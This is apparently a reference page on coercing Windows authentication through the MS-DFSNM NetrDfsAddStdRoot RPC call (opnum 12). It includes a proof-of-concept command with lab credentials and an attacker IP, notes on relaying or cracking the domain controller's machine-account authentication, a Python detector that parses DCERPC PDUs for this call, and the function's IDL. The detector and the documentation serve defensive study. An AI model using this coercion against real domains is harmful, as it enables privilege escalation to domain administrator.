
MS-DFSNM - Remote call to NetrDfsAddStdRoot (opnum 12)

Summary

Description

In order to call a remote procedure that triggers an authentication from the remote machine to an arbitrary target, we first need to authenticate to the remote machine, usually over SMB. Then we need to connect to the remote SMB pipe \PIPE\netdfs and bind to the desired MS-DFSNM interface (UUID 4fc742e0-4a10-11cf-8273-00aa004ae673, version 3.0) in order to perform remote procedure calls to the functions of the MS-DFSNM protocol.

In what follows, 192.168.2.51 is my attacking machine, where I listen with Responder, and 192.168.2.1 is the IP of my Windows Server. When started, the script authenticates and connects to the remote pipe named \PIPE\netdfs. This pipe is bound to the protocol [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol and lets us call the RPC functions of this protocol. We then call the remote NetrDfsAddStdRoot function on the remote Windows Server (192.168.2.1) with the following parameters:

NetrDfsAddStdRoot("192.168.2.51\x00", "share\x00", "comment\x00", 0)

We can try this with this proof of concept code (coerce_poc.py):

./coerce_poc.py -d "LAB.local" -u "user1" -p "Podalirius123!" 192.168.2.51 192.168.2.1

This will force the Windows Server (192.168.2.1) to authenticate to the SMB share \\192.168.2.51\share, and therefore to authenticate with its machine account (DC01$). After this RPC call, we get an authentication from the domain controller with its machine account directly on Responder:

After this step, we can relay the authentication to other services in order to elevate our privileges, or try to downgrade it to NTLMv1 and crack it in order to get the NT hash of the domain controller's machine account. This kind of vulnerability allows an attacker to go from a simple domain user to domain administrator very quickly in unprotected domains!
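From the defender's side, the two things described above, a bind to the MS-DFSNM interface on \PIPE\netdfs and a request with opnum 12 on that context, are what a network sensor or named-pipe monitor can look for. The following is an added example and not part of the original PoC or repository: it parses the DCERPC v5 connection-oriented bind and request PDUs of one netdfs connection (assuming no authentication trailer and no object UUID in requests) and flags NetrDfsAddStdRoot calls; the sample PDUs it is fed are constructed here, not captured traffic.

```python
import struct
import uuid
# MS-DFSNM interface and opnum as given on the page; NDR is the transfer syntax used in the samples.
DFSNM_UUID = uuid.UUID("4fc742e0-4a10-11cf-8273-00aa004ae673")
DFSNM_VERSION, NETRDFSADDSTDROOT_OPNUM = (3, 0), 12
PTYPE_REQUEST, PTYPE_BIND = 0, 11
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")

def parse_pdu(pdu: bytes) -> dict:
    # DCERPC v5 connection-oriented header; assumes no auth trailer and no object UUID in requests.
    vers, _, ptype, _, _, frag_len, _, call_id = struct.unpack_from("<BBBB4sHHI", pdu, 0)
    assert vers == 5 and frag_len == len(pdu), "not a well-formed, unfragmented DCERPC v5 PDU"
    info = {"ptype": ptype, "call_id": call_id}
    if ptype == PTYPE_BIND:
        # bind body: max_xmit(2) max_recv(2) assoc_group(4) n_ctx(1) pad(3), then the context list
        n_ctx, off, ctxs = pdu[24], 28, {}
        for _ in range(n_ctx):
            ctx_id, n_ts = struct.unpack_from("<HB", pdu, off)
            abstract = uuid.UUID(bytes_le=pdu[off + 4:off + 20])  # UUID fields are little-endian on the wire
            ctxs[ctx_id] = (abstract, struct.unpack_from("<HH", pdu, off + 20))  # (uuid, (major, minor))
            off += 24 + 20 * n_ts  # skip this context's transfer syntaxes (20 bytes each)
        info["contexts"] = ctxs
    elif ptype == PTYPE_REQUEST:
        _, info["ctx_id"], info["opnum"] = struct.unpack_from("<IHH", pdu, 16)  # alloc_hint, p_cont_id, opnum
    return info

def flag_coercion_attempts(pdus: list) -> list:
    # Walk one \PIPE\netdfs connection; report NetrDfsAddStdRoot requests on a context bound to MS-DFSNM 3.0.
    dfsnm_ctx_ids, hits = set(), []
    for info in map(parse_pdu, pdus):
        if info["ptype"] == PTYPE_BIND:
            for ctx_id, (abstract, version) in info["contexts"].items():
                if abstract == DFSNM_UUID and version == DFSNM_VERSION:
                    dfsnm_ctx_ids.add(ctx_id)
        elif info["ptype"] == PTYPE_REQUEST and info["ctx_id"] in dfsnm_ctx_ids:
            if info["opnum"] == NETRDFSADDSTDROOT_OPNUM:
                hits.append(f"call_id {info['call_id']}: NetrDfsAddStdRoot (opnum 12) on MS-DFSNM")
    return hits

# Constructed sample PDUs (not captured traffic) so the detector can be exercised offline.
def _header(ptype: int, call_id: int, body_len: int) -> bytes:
    return struct.pack("<BBBB4sHHI", 5, 0, ptype, 0x03, b"\x10\x00\x00\x00", 16 + body_len, 0, call_id)
def build_bind(ctx_id: int, abstract: uuid.UUID, version: tuple) -> bytes:
    body = struct.pack("<HHIBBH", 4280, 4280, 0, 1, 0, 0)  # one presentation context
    body += struct.pack("<HBB", ctx_id, 1, 0) + abstract.bytes_le + struct.pack("<HH", *version)
    body += NDR_SYNTAX.bytes_le + struct.pack("<I", 2)  # one transfer syntax: NDR v2
    return _header(PTYPE_BIND, 1, len(body)) + body
def build_request(ctx_id: int, opnum: int, stub: bytes = b"") -> bytes:
    body = struct.pack("<IHH", len(stub), ctx_id, opnum) + stub
    return _header(PTYPE_REQUEST, 2, len(body)) + body
```

A request for opnum 12 on a context that was never bound to MS-DFSNM, or a bind to another interface, produces no hit, so the detector keys on the interface UUID rather than on the pipe name alone.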


Function technical detail

NET_API_STATUS NetrDfsAddStdRoot(
    [in, string] WCHAR* ServerName,
    [in, string] WCHAR* RootShare,
    [in, string] WCHAR* Comment,
    [in] DWORD ApiFlags
);
  • ServerName: The pointer to a null-terminated Unicode string. This is the host name of the new DFS root target.

  • RootShare: The pointer to a null-terminated Unicode string. This is the new DFS root target share name as well as the DFS namespace name. The share MUST already exist.

  • Comment: The pointer to a null-terminated Unicode string that contains a comment associated with the DFS namespace. Used for informational purposes, this string has no protocol-specified restrictions on length or content. The comment is meant for human consumption and does not affect server functionality. This parameter MAY be a NULL pointer.

  • ApiFlags: This parameter is reserved for future use and is ignored by the server.

References